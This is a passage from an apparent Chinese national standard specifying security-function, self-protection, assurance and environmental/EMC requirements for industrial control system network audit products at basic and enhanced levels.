产品应支持对工业控制协议应用数据进行分析和还原,支持至少一种工业控制协议。至少支持: a) 组态变更,包括上传、下载; b) 指令变更,包括写指令及相关参数,如控制点位地址、控制值等。 6.1.1.3 审计事件识别和分析 6.1.1.3.1 基于白名单规则分析 6.1.1.3.1.1 白名单规则定义 产品应支持白名单规则的定义: a) 网络通信白名单:支持基于 IP 或 MAC 等要求进行规制定义; b) 工业控制协议通信白名单:支持基于控制命令、控制点位、控制值等要素进行规则定义。 6.1.1.3.1.2 白名单方式识别 产品应支持基于白名单机制对审计信息的识别。 6.1.1.3.2 异常事件识别 产品应支持对以下异常事件的识别: a) 网络中出现 IP 或 MAC 白名单之外的设备; b) 工业控制协议通信出现异常的控制命令、控制点位、控制值。 6.1.1.4 审计记录 6.1.1.4.1 记录内容 产品应按照事件的分类和级别,生成包含以下内容的审计记录: a) 事件主体; b) 事件客体; c) 事件发生的日期和时间; d) 事件类型; e) 事件的级别; f) 审计源身份(分布式产品); g) 事件的描述; h) 工业控制协议的深度解析内容,至少包括控制命令、控制点位、控制值。 6.1.1.4.2 事件分类 产品应对事件按用户可理解的方式进行分类,方便用户浏览和策略定制。如按事件的潜在风险分 类,正常事件、异常事件;按协议类型分类等。 6.1.1.4.3 事件分级 产品应将异常事件可能的潜在危害程度划分为不同的级别,对不同级别的事件采取不同的处理方式。 6.1.1.4.4 数据库支持 产品应支持一种数据库管理软件,用于存储审计记录,方便用户查阅、检索和统计分析。 6.1.1.5 事件响应和报警 6.1.1.5.1 事件告警 产品应能对系统安全策略定义的不同等级的事件采取不同方式进行告警。 6.1.1.5.2 告警方式 产品应产生报警,响应报警方式至少包含以下方式中的一种: a) 管理界面告警; b) 向网管中心发送 SNMP Trap 报警消息; c) 向声光电发生装置发送启动信号; d) 向网管人员发送 SMS 报警短消息。 6.1.1.6 审计查阅和报表 6.1.1.6.1 常规查阅 产品应提供查阅审计记录的工具,查阅的结果应以用户易于理解的方式和格式提供,并且能支持导 出及打印。 6.1.1.6.2 有限查阅 产品应确保除授权管理员之外,其他用户无权对审计记录进行查阅。 6.1.1.6.3 可选查阅 产品应为授权管理员提供将审计记录按一定的条件进行选择、搜索、分类和排序的功能,所得结果 应以用户友好的、便于理解的形式提供报告或打印。 6.1.1.6.4 审计报表 报表生成器将审计分析器传来的分析结果进行数据汇总报表输出,对报表至少有以下要求: a) 产品应提供审计报表模板,能够基于模板生成审计报表; b) 报告内容应至少支持文字、图像两种描述方式; c) 审计数据报告生成格式应至少支持 txt、html、doc、xls、pdf 等通用文件格式中的一种。 6.1.1.7 审计记录存储 6.1.1.7.1 存储安全 产品应提供安全机制保护审计记录数据免遭未经授权的删除或修改,如采取严格的身份鉴别机制 和适合的文件读写权限等。任何对审计记录数据的删除或修改都应生成系统自身安全审计记录。应对 审计记录进行完整性保护。 6.1.1.7.2 存储空间耗尽处理 产品应提供数据存储空间耗尽处理功能,当剩余存储空间达到预定义的阈值时进行告警。 6.1.2 自身安全要求 6.1.2.1 标识和鉴别 6.1.2.1.1 唯一性标识 产品应保证任何用户都具有全局唯一的标识。 6.1.2.1.2 管理员属性定义 产品应为每个管理员规定与之相关的安全属性,如管理员标识、鉴别信息、隶属组、权限等,并提供 使用默认值对创建的每个管理员的属性进行初始化的功能。 6.1.2.1.3 管理员角色 产品应为管理角色进行分级,使不同级别的管理角色具有不同的管理权限。 6.1.2.1.4 基本鉴别 产品应保证任何用户在执行安全功能前都要进行身份鉴别。若采用口令方式鉴别,应支持对口令 强度进行检查,如口令长度、是否需包含数字、字母、特殊字符等。 6.1.2.1.5 超时锁定或注销 当已通过身份鉴别的管理角色空闲操作的时间超过规定值时,在该管理角色执行管理功能前,产品 应对该管理角色的身份重新进行鉴别。 6.1.2.1.6 鉴别失败处理 产品应为管理员登录设定一个授权管理员可修改的鉴别尝试阈值,当管理员的不成功登录尝试超 过阈值时,系统应通过技术手段阻止管理员的进一步鉴别请求。 6.1.2.1.7 鉴别数据保护 产品应保证管理员鉴别数据以非明文形式存储,不被未授权查看或修改。 6.1.2.2 安全管理 6.1.2.2.1 接口及管理安全 产品应保证业务接口、管理接口、管理界面的安全: a) 业务接口和管理接口采用不同的网络接口; b) 业务接口采取被动收包方式工作,不得外发数据包; c) 管理接口及管理界面不存在中高风险安全漏洞。 6.1.2.2.2 管理信息传输安全 产品需要通过网络进行管理时,产品应能对管理信息进行保密传输。 6.1.2.2.3 安全状态监测 产品应能够监测产品自身及组件状态,包括对产品 CPU、内存、存储空间等系统资源使用状态进行 监测。 6.1.2.3 时间同步 产品及组件应支持以下时间同步功能: a) 若由多个组件组成,各组件支持与审计中心进行时间同步; b) 审计中心支持与外部时间服务器进行时间同步。 6.1.2.4 审计日志 6.1.2.4.1 审计日志生成 产品应对与自身安全相关的以下事件生成审计日志: a) 身份鉴别,包括成功和失败; b) 因鉴别失败次数超过了阈值而采取的禁止进一步尝试的措施; c) 审计策略的增加、删除、修改。 6.1.2.4.2 审计日志内容 审计日志内容至少应包括日期、时间、事件主体、事件客体、事件描述等。 6.1.2.4.3 审计日志存储 产品应将自身审计日志与审计记录分开保存到不同的记录文件或数据库(或同一数据库的不同表) 中,方便用户查阅和分析。应保证自身审计日志存储的最短期限不少于6个月。 6.1.3 安全保障要求 6.1.3.1 开发 6.1.3.1.1 安全架构 开发者应提供产品安全功能的安全架构描述,技术要求如下: a) 与产品设计文档中对安全功能的描述一致; b) 描述与安全功能要求一致的安全域; c) 描述产品安全功能初始化过程及安全措施; d) 证实产品安全功能能够防止被破坏; e) 证实产品安全功能能够防止安全策略被旁路。 6.1.3.1.2 功能规范 开发者应提供完备的功能规范说明,技术要求如下: a) 完整描述产品的安全功能; b) 描述所有安全功能接口的目的与使用方法; c) 标识和描述每个安全功能接口相关的所有参数; d) 描述安全功能接口相关的安全功能实施行为; e) 描述由安全功能实施行为而引起的直接错误消息; f) 证实安全功能要求到安全功能接口的追溯。 6.1.3.1.3 产品设计 开发者应提供产品设计文档,技术要求如下: a) 根据子系统描述产品结构,并标识和描述产品安全功能的所有子系统; b) 描述安全功能所有子系统间的相互作用; c) 提供的映射关系能够证实设计中描述的所有行为能够映射到调用它的安全功能接口。 6.1.3.2 指导性文档 6.1.3.2.1 操作用户指南 开发者应提供明确和合理的操作用户指南,操作用户指南与为评估而提供的其他所有文档保持一 致,对每一种用户角色的描述要求如下: a) 描述授权用户可访问的功能和特权,包含适当的警示信息; b) 描述如何以安全的方式使用产品提供的接口; c) 描述可用功能和接口,尤其是受用户控制的所有安全参数,适当时指明安全值; d) 明确说明与需要执行的用户可访问功能有关的每一种安全相关事件,包括改变安全功能所控 制实体的安全特性; e) 标识产品运行的所有可能状态(包括操作导致的失败或者操作性错误),以及他们与维持安全 运行之间的因果关系和联系; f) 实现安全目的所应执行的安全策略。 6.1.3.2.2 准备程序 开发者应提供产品及其准备程序,技术要求如下: a) 描述与开发者交付程序相一致的安全接收所交付产品必需的所有步骤; b) 描述安全安装产品及其运行环境必需的所有步骤。 6.1.3.3 生命周期支持 6.1.3.3.1 配置管理能力 开发者的配置管理能力应满足以下要求: a) 为产品的不同版本提供唯一的标识; b) 使用配置管理系统对组成产品的所有配置项进行维护,并唯一标识各配置项; c) 提供配置管理文档,配置管理文档描述用于唯一标识配置项的方法。 6.1.3.3.2 配置管理范围 开发者应提供产品配置项列表,并说明配置项的开发者。配置项列表至少包括产品、安全保障要求 的评估证据和产品的组成部分。 6.1.3.3.3 交付程序 开发者应使用一定的交付程序交付产品,并将交付过程文档化。在给用户方交付产品的各版本时, 交付文档应描述为维护安全所必需的所有程序。 6.1.3.3.4 支撑系统安全保障 开发者应明确产品支撑系统的安全保障措施,技术要求如下: a) 若产品以软件形态提交,应在交付文档中详细描述支撑操作系统的兼容性、可靠性、安全性要求; b) 若产品以硬件形态提交,应选取和采用安全可靠的支撑操作系统,以最小化原则选取必要的系 统组件,并采取一定的加固措施。 6.1.3.3.5 硬件安全保障 若产品以硬件形态提交,开发者应采取措施保障硬件安全,技术要求如下: a) 产品应采用具有高可靠性、满足性能指标要求的硬件平台; b) 若硬件平台为外购,应制定相应程序对硬件提供商进行管理、对采购的硬件平台或部件进行验 证测试,并要求硬件提供商提供合格证明及必要的第三方环境适用性测试报告。 6.1.3.4 测试 6.1.3.4.1 测试覆盖 开发者应提供测试覆盖文档,测试覆盖描述应表明测试文档中所标识的测试与功能规范中所描述 的产品的安全功能间的对应性。 6.1.3.4.2 功能测试 开发者应测试产品安全功能,将结果文档化并提供测试文档。测试文档应包括以下内容: a) 测试计划,标识要执行的测试,并描述执行每个测试的方案,这些方案包括对于其他测试结果 的任何顺序依赖性; b) 预期的测试结果,表明测试成功后的预期输出; c) 实际测试结果和预期的测试结果一致。 6.1.3.4.3 性能测试 开发者应测试产品性能,将结果文档化并提供测试文档。测试文档应包括以下内容: a) 测试计划,标识要执行的性能测试指标,并描述执行每个测试的方案,这些方案包括产品的安 全参数及安全策略条件,测试工具仪表及其配置参数等; b) 测试结果,记录各条件下测试的性能指标值。 6.1.3.4.4 独立测试 开发者应提供一组与其自测安全功能时使用的同等资源,以用于安全功能的抽样测试。 6.1.3.5 脆弱性评定 基于已标识的潜在脆弱性,产品能够抵抗基本的攻击。 6.2 增强级安全技术要求 6.2.1 安全功能要求 6.2.1.1 审计数据采集 6.2.1.1.1 采集策略 产品应支持基于策略的数据采集: a) 支持基于网络层要素的数据采集策略:至少包括源目的 MAC 或源目的 IP、传输层协议、目的 端口; b) 支持基于工业控制协议的数据采集策略; c) 支持全流量报文的采集。 6.2.1.1.2 网络流量监测 产品应能根据源目的 MAC 或 IP 地址、协议类型、日期时间段等对流量进行监测,并以统计报表的 形式输出。 6.2.1.1.3 审计数据生成 产品应在实际的系统环境和网络带宽下及时生成审计数据。 6.2.1.2 审计数据还原 6.2.1.2.1 网络层通信协议还原 产品应支持对网络层通信协议的数据进行还原,至少包括源目的 MAC、源目的 IP、传输层协议、源 目的端口、应用层协议类型。 6.2.1.2.2 通用应用协议还原 产品应支持对 HTTP 、FTP 、TELNET 协议的应用数据还原: a) HTTP 通信:目标 URL; b) FTP 通信:使用的账号、输入命令; c) TELNET 通信:使用的账号、输入命令。 6.2.1.2.3 工业控制协议还原 产品应支持对工业控制协议应用数据进行分析和还原,支持至少三种工业控制协议。至少支持: a) 组态变更,包括上传、下载; b) 指令变更,包括写指令及相关参数,如控制点位地址、控制值等; c) 负载变更。 6.2.1.3 审计事件识别和分析 6.2.1.3.1 事件辨别扩展接口 产品应提供一个功能接口,对自身无法辨别的工业控制协议和安全事件,用户可通过该接口,将扩 展的事件辨别模块以插件的形式接入事件辨别器。 6.2.1.3.2 基于白名单规则分析 6.2.1.3.2.1 白名单规则定义 产品应支持白名单规则的定义: a) 网络通信白名单:支持基于源目的 MAC 或源目的IP、传输层协议、目的端口等要素进行规则定义; b) 工业控制协议通信白名单:支持基于协议格式规约、控制命令、控制点位、控制值等要素进行规 则定义。 6.2.1.3.2.2 白名单方式识别 产品应支持基于白名单机制对审计信息的识别。 6.2.1.3.2.3 学习模式 产品应支持学习模式,对网络流量进行学习,自动生成推荐性规则,至少包括网络层规则和工业控 制协议应用层规则。 6.2.1.3.3 异常事件 6.2.1.3.3.1 异常事件识别 产品应支持对以下异常事件的识别: a) 网络层通信异常:不合规的通信链路,包括源IP、源 MAC、目 的 IP、目的 MAC、目的端口等; b) 工业控制协议通信出现异常的控制命令、控制点位、控制值; c) 不符合协议规约规定格式的工业控制协议报文; d) 端口报文异常:端口报文速率突变、超过阈值、长时间无报文; e) 工业控制协议应用层断链及断链后重连等。 6.2.1.3.3.2 自定义识别规则 产品应维护一个与被审计信息系统相关的恶意事件集合,可结合控制系统的实际生产工艺进行定 义,当这些事件发生时表明信息系统受到了攻击。恶意事件集合应可定制。 6.2.1.3.3.3 基于规则事件生成 产品支持基于黑名单规则对异常事件进行分析,识别并生成恶意事件。 6.2.1.3.3.4 基于统计的分析 产品应提供基于统计方式对审计事件进行分析,单个审计事件累计发生次数或单个审计事件发生 频率超过阈值时,分析生成新的事件。 6.2.1.3.4 关联分析 产品应支持事件的关联分析,并进行以下操作: a) 对相互关联的事件进行综合分析和判断; b) 向授权用户提供自定义匹配模式。 6.2.1.4 审计记录 6.2.1.4.1 记录内容 产品应按照事件的分类和级别,生成包含以下内容的审计记录: a) 事件主体; b) 事件客体; c) 事件发生的日期和时间; d) 事件类型; e) 事件级别; f) 审计源身份(分布式产品); g) 事件的描述; h) 工业控制协议的深度解析内容,至少包括控制命令、控制点位、控制值。 6.2.1.4.2 事件分类 产品应对事件按用户可理解的方式进行分类,方便用户浏览和策略定制。如按事件的潜在风险分类,正常事件、异常事件;按协议类型分类等。 6.2.1.4.3 事件分级 产品应将异常事件可能的潜在危害程度划分为不同的级别,对不同级别的事件采取不同的处理方式。 6.2.1.4.4 数据库支持 产品应支持一种数据库管理软件,用于存储审计记录,方便用户查阅、检索和统计分析。 6.2.1.5 事件响应和报警 6.2.1.5.1 事件响应 对异常事件,应支持全报文审计,以利于事后分析。 6.2.1.5.2 事件告警 产品应能对系统安全策略定义的不同等级的事件采取不同方式进行告警。 6.2.1.5.3 告警方式 产品应产生报警,响应报警方式至少包含以下方式中的两种: a) 管理界面告警; b) 向网管中心发送 SNMP Trap 报警消息; c) 向声光电发生装置发送启动信号; d) 向网管人员发送 SMS 报警短消息。 6.2.1.6 审计查阅和报表 6.2.1.6.1 常规查阅 产品应提供查阅审计记录的工具,查阅的结果应以用户易于理解的方式和格式提供,并且能支持导 出及打印。 6.2.1.6.2 有限查阅 产品应确保除授权管理员之外,其他用户无权对审计记录进行查阅。 6.2.1.6.3 可选查阅 产品应为授权管理员提供将审计记录按一定的条件进行选择、搜索、分类和排序的功能,所得结果 应以用户友好的、便于理解的形式提供报告或打印。 6.2.1.6.4 审计报表 报表生成器将审计分析器传来的分析结果进行数据汇总报表输出,对报表至少有以下要求: a) 产品应提供审计报表模板,能够基于模板生成审计报表; b) 应支持按时间段、源目的 IP、事件级别等条件生成自定义审计报表; c) 报告内容应至少支持文字、图像两种描述方式; d) 审计数据报告生成格式应至少支持txt、html、doc、xls、pdf 等通用文件格式中的一种。 6.2.1.7 审计记录存储 6.2.1.7.1 审计数据外发 产品应支持以标准格式将审计数据外发至其他系统,以做进一步的分析处理。 6.2.1.7.2 存储安全 产品应提供安全机制保护审计记录数据免遭未经授权的删除或修改,如采取严格的身份鉴别机制 和适合的文件读写权限等。任何对审计记录数据的删除或修改都应生成系统自身安全审计记录。应对 审计记录进行完整性保护。 6.2.1.7.3 存储空间耗尽处理 产品应提供数据存储空间耗尽处理功能: a) 当剩余存储空间达到预定义的阈值时进行告警; b) 在存储空间耗尽前采取一定的措施(如:转储等)防止新近审计记录丢失。 6.2.2 自身安全要求 6.2.2.1 标识和鉴别 6.2.2.1.1 唯一性标识 产品应保证任何用户都具有全局唯一的标识。 6.2.2.1.2 管理员属性定义 产品应为每个管理员规定与之相关的安全属性,如管理员标识、鉴别信息、隶属组、权限等,并提供 使用默认值对创建的每个管理员的属性进行初始化的功能。 6.2.2.1.3 管理员角色 产品应为管理角色进行分级,使不同级别的管理角色具有不同的管理权限。各管理角色的权限应 形成互相制约关系。 6.2.2.1.4 基本鉴别 产品应保证任何用户在执行安全功能前都要进行身份鉴别。若采用口令方式鉴别,应支持对口令 强度进行检查,如口令长度、是否需包含数字、字母、特殊字符等。 若其采用网络远程方式管理,还应对 管理地址进行识别。 6.2.2.1.5 多鉴别 产品应能向管理角色提供除口令身份鉴别机制以外的其他身份鉴别机制(如证书、智能 IC 卡、指 纹、视网膜等鉴别机制)。 6.2.2.1.6 超时锁定或注销 当已通过身份鉴别的管理角色空闲操作的时间超过规定值时,在该管理角色执行管理功能前,产品 应对该管理角色的身份重新进行鉴别。 6.2.2.1.7 鉴别失败处理 产品应为管理员登录设定一个授权管理员可修改的鉴别尝试阈值,当管理员的不成功登录尝试超 过阈值时,系统应通过技术手段阻止管理员的进一步鉴别请求。 6.2.2.1.8 鉴别数据保护 产品应保证管理员鉴别数据以非明文形式存储,不被未授权查看或修改。 6.2.2.2 安全管理 6.2.2.2.1 接口及管理安全 产品应保证业务接口、管理接口、管理界面的安全: a) 业务接口和管理接口采用不同的网络接口; b) 业务接口采取被动收包方式工作,不得外发数据包; c) 管理接口及管理界面不存在中高风险安全漏洞。 6.2.2.2.2 管理信息传输安全 产品需要通过网络进行管理时,产品应能对管理信息进行保密传输。 6.2.2.2.3 安全状态监测 产品应能够监测产品自身及组件状态,包括: a) 对产品 CPU、内存、存储空间等系统资源使用状态进行监测; b) 对产品的主要功能模块运行状态进行监测; c ) 产品若由多个组件组成,审计中心能够对各组件的运行状态进行监测。 6.2.2.2.4 分布式部署 产品应支持分布式部署模式,审计中心能够对多个采集器所采集的数据进行集中分析处理。 6.2.2.3 时间同步 产品及组件应支持时间同步功能: a) 若由多个组件组成,各组件支持与审计中心进行时间同步; b) 审计中心支持与外部时间服务器进行时间同步。 6.2.2.4 审计日志 6.2.2.4.1 审计日志生成 产品应对与自身安全相关的以下事件生成审计日志: a) 身份鉴别,包括成功和失败; b) 因鉴别失败次数超过了阈值而采取的禁止进一步尝试的措施; c) 管理员的增加、删除、修改; d) 审计策略的增加、删除、修改; e) 时间同步; f) 超过保存时限的审计记录和自身审计日志的自动删除; g) 审计日志和审计记录的备份与恢复; h) 存储空间达到阈值报警; i) 其他事件。 6.2.2.4.2 审计日志内容 审计日志内容至少应包括日期、时间、事件主体、事件客体、事件描述等。 6.2.2.4.3 审计日志存储 产品应将自身审计日志与审计记录分开保存到不同的记录文件或数据库(或同一数据库的不同表) 中,方便用户查阅和分析。应保证自身审计日志存储的最短期限不少于6个月。 6.2.3 安全保障要求 6.2.3.1 开发 6.2.3.1.1 安全架构 开发者应提供产品安全功能的安全架构描述,技术要求如下: a) 与产品设计文档中对安全功能的描述一致; b) 描述与安全功能要求一致的安全域; c) 描述产品安全功能初始化过程及安全措施; d) 证实产品安全功能能够防止被破坏; e) 证实产品安全功能能够防止安全策略被旁路。 6.2.3.1.2 功能规范 开发者应提供完备的功能规范说明,技术要求如下: a) 完整描述产品的安全功能; b) 描述所有安全功能接口的目的与使用方法; c) 标识和描述每个安全功能接口相关的所有参数; d) 描述安全功能接口相关的安全功能实施行为; e) 描述由安全功能实施行为而引起的直接错误消息; f) 证实安全功能要求到安全功能接口的追溯; g) 描述安全功能实施过程中,与安全功能接口相关的所有行为; h) 描述可能由安全功能接口的调用而引起的所有错误消息。 6.2.3.1.3 实现表示 开发者应提供全部安全功能的实现表示,技术要求如下: a) 提供产品设计描述与实现表示实例之间的映射,并证明其一致性; b) 详细定义产品安全功能,达到无须进一步设计就能生成安全功能的程度; c) 实现表示以开发人员使用的形式提供。 6.2.3.1.4 产品设计 开发者应提供产品设计文档,技术要求如下: a) 根据子系统描述产品结构,并标识和描述产品安全功能的所有子系统; b) 描述安全功能所有子系统间的相互作用; c) 提供的映射关系能够证实设计中描述的所有行为能够映射到调用它的安全功能接口; d) 根据模块描述安全功能,并提供安全功能子系统到模块间的映射关系; e) 描述所有安全功能实现模块,包括其目的及与其他模块间的相互关系; f) 描述所有模块的安全功能要求相关接口、与其他相邻接口的调用参数及返回值; g) 描述所有安全功能的支撑或相关模块,包括其目的及与其他模块间的相互作用。 6.2.3.2 指导性文档 6.2.3.2.1 操作用户指南 开发者应提供明确和合理的操作用户指南,操作用户指南与为评估而提供的其他所有文档保持一 致,对每一种用户角色的描述要求如下: a) 描述授权用户可访问的功能和特权,包含适当的警示信息; b) 描述如何以安全的方式使用产品提供的接口; c) 描述可用功能和接口,尤其是受用户控制的所有安全参数,适当时指明安全值; d) 明确说明与需要执行的用户可访问功能有关的每一种安全相关事件,包括改变安全功能所控 制实体的安全特性; e) 标识产品运行的所有可能状态(包括操作导致的失败或者操作性错误),以及它们与维持安全 运行之间的因果关系和联系; f) 实现安全目的所应执行的安全策略。 6.2.3.2.2 准备程序 开发者应提供产品及其准备程序,技术要求如下: a) 描述与开发者交付程序相一致的安全接收所交付产品必需的所有步骤; b) 描述安全安装产品及其运行环境必需的所有步骤。 6.2.3.3 生命周期支持 6.2.3.3.1 配置管理能力 开发者的配置管理能力应满足以下要求: a) 为产品的不同版本提供唯一的标识; b) 使用配置管理系统对组成产品的所有配置项进行维护,并唯一标识各配置项; c) 提供配置管理文档,配置管理文档描述用于唯一标识配置项的方法; d) 配置管理系统提供一种自动方式来支持产品的生成,并确保只能对配置项进行已授权的变更; e) 配置管理文档包括配置管理计划,计划中需描述如何使用配置管理系统,并依据该计划实施配 置管理; f) 配置管理计划描述配置项的变更(包括新建、修改、删除)控制程序。 6.2.3.3.2 配置管理范围 开发者应提供产品配置项列表,并说明配置项的开发者,技术要求如下: a) 产品、安全保障要求的评估证据和产品的组成部分; b) 实现表示、安全缺陷报告及其解决状态。 6.2.3.3.3 交付程序 开发者应使用一定的交付程序交付产品,并将交付过程文档化。在给用户方交付产品的各版本时, 交付文档应描述为维护安全所必需的所有程序。 6.2.3.3.4 开发安全 开发者应提供开发安全文档。开发安全文档应描述在产品的开发环境中,为保护产品设计和实现 的保密性和完整性所必需的所有物理的、程序的、人员的和其他方面的安全措施。 6.2.3.3.5 生命周期定义 开发者应建立一个生命周期模型对产品的开发和维护进行的必要控制,并提供生命周期定义文档 描述用于开发和维护产品的模型。 6.2.3.3.6 工具和技术 开发者应明确定义用于开发产品的工具,并提供开发工具文档无歧义的定义实现中所有语句的含 义和所有依赖选项的含义。 6.2.3.3.7 支撑系统安全保障 开发者应明确产品支撑系统的安全保障措施,技术要求如下: a) 若产品以软件形态提交,应在交付文档中详细描述支撑操作系统的兼容性、可靠性、安全性要求; b) 若产品以硬件形态提交,应选取和采用安全可靠的支撑操作系统,以最小化原则选取必要的系 统组件,并采取一定的加固措施。 6.2.3.3.8 硬件安全保障 若产品以硬件形态提交,开发者应采取措施保障硬件安全,技术要求如下: a) 产品应采用具有高可靠性、满足性能指标要求的硬件平台。 b) 若硬件平台为外购,应制定相应程序对硬件提供商进行管理、对采购的硬件平台或部件进行验 证测试。并要求硬件提供商提供合格证明及必要的第三方环境适用性测试报告。 6.2.3.4 测试 6.2.3.4.1 测试覆盖 开发者应提供测试覆盖文档,技术要求如下: a) 证实测试文档中所标识的测试与功能规范中所描述的产品的安全功能间的对应性; b) 证实功能规范中的所有安全功能接口都进行了测试。 6.2.3.4.2 测试深度 开发者应提供测试深度的分析,技术要求如下: a) 证实测试文档中的测试与产品设计中的安全功能子系统和实现模块之间的一致性; b) 证实产品设计中的所有安全功能子系统、实现模块都已经进行过测试。 6.2.3.4.3 功能测试 开发者应测试产品安全功能,将结果文档化并提供测试文档。测试文档应包括以下内容: a) 测试计划,标识要执行的测试,并描述执行每个测试的方案,这些方案包括对于其他测试结果 的任何顺序依赖性; b) 预期的测试结果,表明测试成功后的预期输出; c) 实际测试结果和预期的测试结果一致。 6.2.3.4.4 性能测试 开发者应测试产品性能,将结果文档化并提供测试文档。测试文档应包括以下内容: a) 测试计划,标识要执行的性能测试指标,并描述执行每个测试的方案,这些方案包括产品的安 全参数及安全策略条件,测试工具仪表及其配置参数等; b) 测试结果,记录各条件下测试的性能指标值。 6.2.3.4.5 独立测试 开发者应提供一组与其自测安全功能时使用的同等资源,以用于安全功能的抽样测试。 6.2.3.5 脆弱性评定 基于已标识的潜在脆弱性,产品能够抵抗较强的攻击。 本附录的环境适应性要求包括气候、电磁兼容、绝缘、接地、机械适应性、外壳防护。应根据设备实 际部署环境的不同,由用户和设备制造商确定具体应满足的要求。 注:本附录环境适应性的编写主要参考了GB/T30094, 其参考的相关标准主要为GB/T2423、GB/T17626 等。 B.2 环境适应性 B.2.1 温度 表 B.1 规定了设备工作、贮存和运输温度条件。设备在规定的工作温度范围内工作时,其功能和性 能应满足本附录的规定。在规定的温度范围内贮存和运输时,不应发生裂痕、老化或其他损坏;当经受 该温度范围后再恢复到工作温度范围时,设备应能正常工作。应用于温度快速变化场合的设备、在经受 不超过5℃/min 的温度变化时应能正常工作。 表 B.1 温度条件 等级 工作温度 ℃ 贮 存 和 运 输 温 度 ℃ 低温 高温 低温 高温 0 60 -40 70 Ⅱ -40 70 -40 85 X“ 特定 X 是 一 个 开 放 等 级 , 具 体 温 度 要 求 范 围 可 根 据 设 备 实 际 应 用 环 境 与 客 户 协 商 确 定 。 B.2.2 相对湿度 设备在表 B.2 规定的相对湿度环境条件下应能正常工作。 表 B.2 相对湿度条件(无凝结) 等级 低相对湿度 % 高相对湿度 % I 5 95 X“ 特定 X是一个开放等级,具体相对湿度要求范围可根据设备实际应用环境与客户协商确定。 B.2.3 大气压力 设备工作大气压力条件见表 B.3。 表 B.3 大气压力条件 等级 低气压 kPa 高气压 kPa I 80 106 Ⅱ 70 106 X“ 特定 °X是一个开放等级,具体抗腐蚀性要求范围可根据设备实际应用环境与客户协商确定。 B.2.4 防腐蚀 设备工作在盐雾环境条件下或存在其他化学活性物质,应提供工业环境中抗腐蚀和侵蚀的能力,保 证设备在表 B.4、表 B.5 规定的环境条件下能够长期使用。 表 B.4 盐雾 等级 最大盐雾浓度 mg/m³ I ≤5 X° 特定 X是一个开放等级,具体抗腐蚀性要求范围可根据设备实际应用环境与客户协商确定。 表 B.5 化学活性物质条件 等级 依据标准 化学活性物质 I GB/T 17214.4—2005 工业清洁空气 Ⅱ 中等污染 Ⅲ 严重污染 X“ 特定 ”X是一个开放等级,具体抗腐蚀性要求范围可根据设备实际应用环境与客户协商确定。 B.2.5 抗霉变 设备工作在潮湿多雨地区和霉菌滋生环境下不应发生霉变,并能够正常工作。 B.3 电磁兼容性 设备应满足工业环境中的电磁兼容性要求,具体技术指标见表 B.7~表 B.26。 其中,电磁兼容辐射和传导发射限值按GB4824—2013 为 CLASS A,电磁兼容抗扰度的性能判据 要求详见表 B.6。 表 B.6 性能判据 性能评价判据 说明 A 试验期间和试验后受试设备均应按预期要求继续运行,无功能丧失或性能下降 B 试验期间,受试设备允许出现暂时的性能下降或功能丧失,但设备可以自我恢复,试验后设备应按 预期要求继续运行。不能出现系统死机、复位或重启 C 试验期间,允许受试设备出现暂时的性能下降或功能丧失,但需要人工干预或系统复位才能恢复 表 B.7 辐射发射及传导发射要求 测试项 测试端口 依据标准 测试频段 限值 辐射发射 整机 GB 4824—2013、 GB/T 9254—2008 30 MHz~1 GHz A类 传导发射 电源口、信号口 150 kHz~30 MHz A类 表 B.8 外壳端口静电放电抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T17626.2—2018 3(接触放电±6 kV,空气放电±8 kV) A Ⅱ 4(接触放电士8 kV,空气放电士15 kV) A X“ 特定 “X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.9 整机射频电磁场辐射抗扰度要求 等级 依据标准 严酷等级 试验频段 判据 I GB/T17626.3—2016 2(3 V/m,80%AM) 80 MHz~1 GHz A Ⅱ 3(10 V/m,80%AM) A X 特定 ”X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.10 电源端口及信号端口电快瞬变脉冲群抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.4—2018 3(电源口士2 kV,信号口±1 kV) A Ⅱ 4(电源口±4 kV,信号口±2 kV) A X 特定 X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.11 信号端口浪涌(冲击)抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.5—2008 线-地 2 A Ⅱ 3 A Ⅲ 4 A X° 特定 X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.12 直流电源输入端口浪涌(冲击)抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.5—2008 线-地 3 线-线 3 A Ⅱ 4 4 A X 特定 ’X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.13 交流电源输入端口浪涌(冲击)抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.5—2008 线-地 3 线-线 3 A Ⅱ 4 4 A X⁴ 特定 “X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.14 电源端口及信号端口射频场感应的传导骚扰抗扰度要求 等级 依据标准 严酷等级 试验频段 判据 I GB/T 17626.6—2017 2(3 V,80%AM) 150 kHz~80 MHz A Ⅱ 3(10 V,80%AM) A X 特定 X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.15 整机工频磁场抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.8—2006 稳定持续磁场:4级;短时作用磁场:4级 A Ⅱ 稳定持续磁场:5级;短时作用磁场:5级 A X“ 特定 X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.16 整机阻尼振荡磁场抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.10—2017 4 A Ⅱ 5 A X“ 特定 ”X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.17 电源端口阻尼振荡波抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.18—2016 2 A Ⅱ 3 A X⁴ 特定 “X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.18 振铃波抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T17626.12—2013的表1 3 A Ⅱ 4 A X“ 特定 “X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.19 电源口0 Hz~150 Hz共模传导骚扰抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.16—2007 3 A Ⅱ 4 A X° 特定 